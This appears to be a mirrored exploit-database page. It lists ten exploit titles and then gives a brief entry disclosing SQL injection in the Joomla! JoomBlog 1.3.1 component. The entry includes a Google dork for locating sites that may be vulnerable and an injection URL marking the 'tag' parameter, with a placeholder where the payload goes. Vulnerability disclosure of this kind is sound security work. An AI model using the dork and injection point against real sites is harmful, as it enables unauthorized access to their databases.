
10 new exploits Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure NVIDIA Driver 375.70 - DxgkDdiEscape 0x100008b Out-of-Bounds Read/Write NVIDIA Driver 375.70 - Buffer Overflow in Command Buffer Submission GOM Player 2.3.10.5266 - '.fpx' Denial of Service Cisco ASA - WebVPN CIFS Handling Buffer Overflow OpenText Documentum D2 - Remote Code Execution Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit) Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities Joomla! Component JoomBlog 1.3.1 - SQL Injection Joomla! Component JSP Store Locator 2.2 - 'id' Parameter SQL Injection
17 lines
664 B
Text
Executable file
17 lines
664 B
Text
Executable file
# # # # #
|
|
# Exploit Title: Joomla! Component JoomBlog v1.3.1 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_joomblog
|
|
# Date: 15.02.2017
|
|
# Vendor Homepage: http://joomplace.com/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/authoring-a-content/blog/joomblog/
|
|
# Demo: http://demo30.joomplace.com/our-products/joomblog/
|
|
# Version: 1.3.1
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_joomblog&task=tag&tag=Ihsan_Sencan[SQL]
|
|
# # # # #
|